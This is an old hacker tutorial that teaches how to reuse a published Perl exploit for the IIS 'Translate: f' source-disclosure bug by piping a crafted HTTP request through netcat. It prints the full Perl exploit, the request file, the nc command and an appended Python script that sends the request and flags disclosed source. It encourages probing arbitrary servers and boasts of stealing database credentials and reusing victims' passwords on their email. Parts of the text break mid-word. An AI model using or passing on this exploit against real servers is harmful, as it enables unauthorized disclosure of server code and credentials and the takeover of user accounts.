***************************************************************************************************************

Cribbing Perl code to recover exploits for use in netcat_nt

-------------------------------------------------------------------------

by MooMF 09/2002

***************************************************************************************************************

You'll need:

netcat (for NT/2000);

the Perl exploit for the "Translate: f" malformed GET request (currently @
http://www.securiteam.com/windowsntfocus/Translate_f_vulnerability_exposes_IIS_files_source.html);

an Internet connection (duh!);

your mind, (a bit).

***************************************************************************************************************

Skill level:

Newbie

Teaches:

A little HTTP, a pinch of netcat, and a quick touch on what Perl is.

You should already know:

Using a DOS command window,

Copying stuff and shit.

***************************************************************************************************************

Synopsis:

This tute looks into practical ways to examine the wealth of exploit code freely available on the
net, using the "Translate: f" exploit as an example. Specifically, we'll look into piping cribbed
HTTP requests, taken from a Perl script, through netcat at a target.

The Translate: f exploit allows the source of ASP pages to be viewed directly, instead of the
HTML-rendered result the server is supposed to return, on IIS 5 servers in certain configurations.
It does this by requesting the file in a manner the webserver does not expect: a trailing backslash
on the path plus a "Translate: f" header makes IIS 5.0 hand the request to its WebDAV component,
which returns the raw file instead of executing the script.

***************************************************************************************************************

Concentrate, here comes the science bit:

Down to business. First thing to do is examine the script, and find out what's going on. We'll
concentrate on the parts of the script that directly relate to how the exploit works, and disregard
the actual mechanics of the Perl code.

Before we look at the exploit proper, I should explain that it is an HTTP-based exploit, in that it
uses HTTP to communicate with the target server. HTTP is the underlying protocol of the web;
when you visit a site using a web browser, HTTP requests are being relayed unnoticed to and from
your machine to allow the transfer of data to take place. Primarily, the HTTP GET request is
used to ask the webserver to send us a given object that forms part of the website we're visiting
(usually an HTML webpage, but it could be a GIF, an ASP page, a database, etc). Other methods
exist (PUT for example), but we're interested only in GET at this point. Several webserver-based
exploits involve either a GET or a PUT, and so allow (reasonably) easy identification of these
HTTP parts within the Perl code. With this in mind, centre your gaze on the section labelled
below.


The exploit, (coded by Roelof Temmingh at Sensepost.com):

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#!/usr/bin/perl
use Socket;

####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}

#####load values
$host = $ARGV[0]; $port = $ARGV[2]; $target = inet_aton($host); $toget = $ARGV[1];

#####build request
# <<--------------- Here: the labelled section is the heredoc below, i.e. the
# raw HTTP request that goes down the wire. The doubled backslash after
# $toget comes out as ONE backslash, because the heredoc is interpolated.
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
# <<--------------- to here: the blank line before EOT ends the headers.
$xtosend=~s/\n/\r\n/g;    # HTTP wants CRLF line endings

####send request
#print $xtosend;
my @results=sendraw($xtosend);
print @results;

#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
    my ($pstr)=@_;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
        die("Socket problems\n");
    # sockaddr_in() builds the same struct the original hand-packed with pack("SnA4x8",...)
    if(connect(S,sockaddr_in($port,$target))){
        my @in;
        select(S); $|=1; print $pstr;      # unbuffered write of the request
        while(<S>){ push @in, $_;          # read until the server closes
            print STDOUT "." if(defined $args{X});}
        select(STDOUT); close(S); return @in;
    } else { die("Can't connect...\n"); }
}

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This Perl script is basically creating a connection from you to the target, based on
parameters passed to the Perl interpreter (the bit that runs the script).

An example of the command syntax, as shown on the webpage, is:

trans.pl www.example.com login.asp 80

Where trans.pl is the name of the script above, www.example.com is the target, login.asp is the
code we want to download, and 80 is the webserver port on www.example.com. We can see the
login.asp parameter is stored in the variable $toget, and the target (www.example.com) is stored in
the variable $host. Don't worry if you don't know what a variable is; just look at the labelled section
again, and you'll see it says |GET /$toget\\ HTTP/1.0| on the first line, and |Host: $host| on the
second line. In essence, the bits that say $toget and $host will be replaced by login.asp and
www.example.com respectively, when the request is sent to the target. In addition, Perl requires
that two backslashes be placed in the script when one is required at output (the heredoc is
interpolated, so "\\" means a literal "\"). So, in reality, this section of the Perl script really means:

GET /login.asp\ HTTP/1.0                <<-------------- Note, only one '\'
Host: www.example.com

With these caveats noted, we can now create a new text file with just the HTTP request in it.
Navigate to netcat's folder, and add to it a new text file called trans.txt. Type the following into
this new file:

GET /global.asa\ HTTP/1.0
Host: www.example.com
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f
<CR>
<CR>

Change www.example.com to the server you're looking to investigate (IP or name is fine), but for
now, leave the file as global.asa. Each header is "Name: value" with a single colon, and the
request line, the Host: line and the Translate: line are the three that matter; the other two
are just what the original script sent.


Short interlude regarding global.asa

"The Global.asa file typically contains scripts to initialise application or session variables,
connect to databases, send cookies, and perform other operations that pertain to the
application as a whole."

Microsoft.

From this description, it's easy to see why the global.asa file is a useful target to
download. Some sites quite literally put the whole enchilada into this sucka; I fondly
remember one site that had the user/pass combinations for an Access database in its
global.asa, along with the location of the database (which was in a read-access area of
the site).

e.g.

Application("scbjobs_ConnectionString") = "DRIVER={Microsoft Access Driver (*.mdb)};DBQ=URL=jobs.mdb"
Application("scbjobs_RuntimeUserName") = "scbjobs"
Application("scbjobs_RuntimePassword") = "sbojbcs"

In the database were the user/pass combinations for users to access the site (which was
pretty dull), along with newsletter email addresses. Now, I kinda got lucky quite a few
times here, as often the users were using the same password to access this piece-of-piss
site as they were for their email accounts. Bingo!! No real hacking required.

Also note the requirement for two carriage returns at the end of the file. Just replace the <CR>
symbols with a press of the enter key each; the resulting blank line is what tells the server the
headers have finished. Save it with Windows line endings (Notepad does this by default): HTTP
expects CR LF at the end of every line, which is exactly what the s/\n/\r\n/g line in the Perl
script was doing for you. Our input file is now ready, and we can move on to look at netcat.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Netcat:

For those who haven't come across netcat before, I'll include here a v.short description of what it
is, what it does, and what it's for. Whilst I won't examine the syntax too deeply, as several
well-written documents already exist that exhaustively explore this topic (plus source code is
available), I will note how we can use it as a carrier for our newly cribbed exploits.

Netcat is essentially a user interface onto the network sockets of the PC. By allowing fairly
low-level access to the underlying network interface, netcat is able to perform some quite remarkable
feats that help us in both enumerating and attacking targets. Primarily for us, it can be used in a
similar role to telnet, in that it offers a console-based interface to open sockets on remote
machines. In addition however, it offers a degree of port probing/banner grabbing capability, and
can also be used as a port listener/redirector, a powerful capability that allows it to wait for
incoming connections on an already compromised target, so it can be used to 'bounce'
connections across to another target (thus improving your anonymity, amongst other things).
Read up on netcat to find out more about these functions.

We’ll be using the basic syntax for netcat, so we can create a connection to our target, and run
our exploit, (trans.txt). We could boot up netcat and type our exploit in manually, but instea
d,
we’ll pipe our exploit through netcat using good old dos pipes.

Crank up a command window. Navigate to the folder we created earlier, and type in this
command:

type trans.txt | nc

vv [target] 80

I’ll deal with the netcat stuff first, on the right of

the command:

nc

vv [target] 80

Here were connecting to the target @ port 80, (the usual webserver port). The

vv part of the
command signifies the options we require, (in this case very verbose output). The [target] part
should be replaced with the sam
e thing you put into trans.txt on the Host: line.

The left
-
hand part of the command is just a dos command. ‘Type’ basically returns the contents of
a file to the STDOUT stream of the console, (usually the screen/your monitor). Just enter ‘type
trans.txt’
on it’s own to see what it does.

Now, the line in the middle is called a pipe, and it’s function is to take the output of the type
program, and dump it as input into netcat, (in essence the STDOUT is redirected to point at
netcat, not your screen. Now t
he text is ‘typed’ into netcat’s interface as though we were doing
it manually). The pipe key is shift + ‘
\
’ on UK keyboards.

Now before we hit enter I should warn you that this exploit is now a little old, and has had an
official patch issued from MS (bulletin MS00-058, back in August 2000). So, don't go expecting
it to work on every target. In fact, don't be surprised if it doesn't work on many servers at all.
This is the nature of network security. Indeed, this is a good time to remind everyone that,
(fanfare please), Enumeration is the key aspect of hacking, even if it just means you don't spend
days trying to exploit a server that is immune to your attacks (technically known as pissin' in
the wind).

So, chances are, when you hit enter, all you'll get back is a crappy looking text dump of the
received HTML (a 404 Object Not Found), correctly delivered from a patched server. However,
occasionally (and I live for these moments), you'll find a sucker who just can't be arsed to keep
up with all the latest patches from MS (who can blame him!), and who is at your mercy. These
responses will be 200 OK, and the body is the contents of the global.asa file on the
server, as coded by the developer: you can tell it's the source rather than a rendered page
because the <script runat=server> or <% ... %> blocks come back unexecuted. Take a moment
and enjoy.

Every now and then, you'll get a 403 Forbidden back, and this may indicate the server is
vulnerable, just not in that folder. Change the target file (the GET line in trans.txt) to another part
of the site to see if any luck can be found there (e.g. change /global.asa\ to
/myworldtakeoverplan/login.asp\, keeping the trailing backslash).
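As an added example (not from the tutorial and not SensePost's code), here is the whole procedure above in Python: build the request the way the Perl heredoc does, with the single trailing backslash and the same \n to \r\n conversion; write it out as the trans.txt that gets piped into netcat; optionally send it over a raw socket the way sendraw() does; and sort the reply into the 200/403/404 outcomes just described. The 200 case is checked a little more strictly than the text does, because a patched server renders the page and also answers 200: it only counts as source disclosure when the body still contains unexecuted server-side markup (<% or runat=). The host names, file names and the three sample replies are constructed for illustration; nothing contacts a real server unless you call probe().

```python
"""Added example: a Python re-creation of the cribbed Translate: f request.

Not part of MooMF's tutorial or SensePost's script.  Host names, file names
and the sample responses below are constructed for illustration.
"""
import socket
import sys

# Markers of server-side ASP code that never reach a client when the page
# was actually executed.  Seeing them in a 200 body is the tell.
SOURCE_MARKERS = (b"<%", b"runat=")


def build_request(host: str, target_file: str) -> bytes:
    """Same request the Perl heredoc builds.

    One backslash follows the path (the Perl source writes "\\\\" to get one),
    then the SensePost headers, then an empty line that ends the header
    block.  Like the Perl s/\\n/\\r\\n/g, every line ending becomes CRLF.
    """
    lines = [
        f"GET /{target_file.lstrip('/')}\\ HTTP/1.0",
        f"Host: {host}",
        "User-Agent: SensePostData",
        "Content-Type: application/x-www-form-urlencoded",
        "Translate: f",
        "",          # blank line = end of headers (the two <CR>s in trans.txt)
        "",
    ]
    return "\n".join(lines).replace("\n", "\r\n").encode("ascii")


def write_trans_txt(path_on_disk: str, host: str, target_file: str) -> int:
    """Write the file that 'type trans.txt | nc -vv host 80' will pipe, in
    binary mode so the CRLFs survive whatever editor or OS you are on.
    Returns the number of bytes written."""
    data = build_request(host, target_file)
    with open(path_on_disk, "wb") as fh:
        fh.write(data)
    return len(data)


def probe(host: str, target_file: str, port: int = 80, timeout: float = 10.0) -> bytes:
    """Counterpart of the Perl sendraw(): connect, send, read until the server
    closes.  Only point this at a host you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, target_file))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def classify(response: bytes) -> str:
    """Map a raw reply onto the outcomes the tutorial describes."""
    head, _, body = response.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return "not-http"
    code = parts[1]
    if code == b"200":
        lowered = body.lower()
        # 200 on its own proves nothing: a patched server renders the page
        # and also says 200.  Raw script blocks in the body are the proof.
        if any(marker in lowered for marker in SOURCE_MARKERS):
            return "source-disclosed"
        return "rendered"
    return {b"403": "forbidden", b"404": "not-found"}.get(code, "other")


# Constructed sample replies (not captured from any real server).
SAMPLE_VULNERABLE = (
    b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n"
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"<SCRIPT LANGUAGE=VBScript RUNAT=Server>\r\n"
    b'Application("scbjobs_RuntimePassword") = "sbojbcs"\r\n'
    b"</SCRIPT>\r\n"
)
SAMPLE_PATCHED = b"HTTP/1.1 404 Object Not Found\r\nServer: Microsoft-IIS/5.0\r\n\r\n<html>...</html>"
SAMPLE_FORBIDDEN = b"HTTP/1.1 403 Forbidden\r\nServer: Microsoft-IIS/5.0\r\n\r\n"


if __name__ == "__main__":
    # usage: trans.py DNS_name/IP file_to_get [port]   (same shape as trans.pl)
    if len(sys.argv) < 3:
        sys.exit("usage: trans.py DNS_name/IP file_to_get [port]")
    port = int(sys.argv[3]) if len(sys.argv) > 3 else 80
    reply = probe(sys.argv[1], sys.argv[2], port)
    print(classify(reply))
    sys.stdout.write(reply.decode("latin-1"))
```

If you would rather stay with netcat, call write_trans_txt("trans.txt", "www.example.com", "global.asa") once and pipe the file exactly as in the command above; the bytes are identical to what probe() sends.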

That’s abo
ut it…. It’s a fairly basic example, I know, but serves well to demonstrate the general
idea behind this learning exercise. Please use this tute as an excuse to further look into the
wealth of knowledge basically lying around on the web as Perl exploits,

and learn. And remember,
in the land of the blind, the one
-
eyed man is king, (this could be you!).


***************************************************************************************************************

Please note usual caveats apply on this text, in terms of my lack of responsibility should you use
this stuff and get caught by the NSA, who think you're a terrorist and start bombing your country
and stuff. I just don't want to hear it. Also, my respects go out to all at AV, (esp. Andy, who
proofed this), and those whose work I've included here.

***************************************************************************************************************

Peace,

MooMF.